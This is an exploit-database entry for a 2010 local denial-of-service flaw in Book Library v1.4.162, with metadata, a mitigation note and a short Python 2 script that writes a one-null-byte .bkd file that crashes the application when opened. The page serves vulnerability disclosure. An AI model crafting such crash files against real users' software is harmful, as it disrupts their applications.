header-logo
Suggest Exploit
vendor:
Book Library
by:
anonymous
7,5
CVSS
HIGH
Local Denial of Service
400
CWE
Product Name: Book Library
Affected Version From: v1.4.162
Affected Version To: v1.4.162
Patch Exists: YES
Related CWE: N/A
CPE: 2.3:a:wensoftware:book_library:1.4.162
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2010

Book Library Local Dos .bkd file

The vulnerability exists in Book Library v1.4.162, when a maliciously crafted .bkd file is opened, it causes a denial of service condition. The malicious file contains a single null byte which causes the application to crash.

Mitigation:

Upgrade to the latest version of Book Library.
Source

Exploit-DB raw data:

# Exploit Title: Book Library Local Dos .bkd file
# Date: April 14, 2010
# Software Link: [http://wensoftware.com/]
# Version: v1.4.162
# Tested on: Windows XP SP3
# Author: [anonymous]
# Site: [www.setfreesecurity.com]
# 
# Click Open at top ->
# Find your .bkd file
# No Response about 5 sec
#
# Greetz Daddas, Exploit-DB crew
#
# I'ts hard to concentrate with echo's of your voice in my head.
#
#!/usr/bin/env python

import time

print "The Encyclopedia of Unsolved Mysteries\n"
time.sleep(1)

book=open('unsolved.bkd', 'w')
book.write('\x00')
book.close()

print "UFO's, Atlantis, Nessie, Oh My!\n"

Navigation

Suggest Exploit

Services By CQR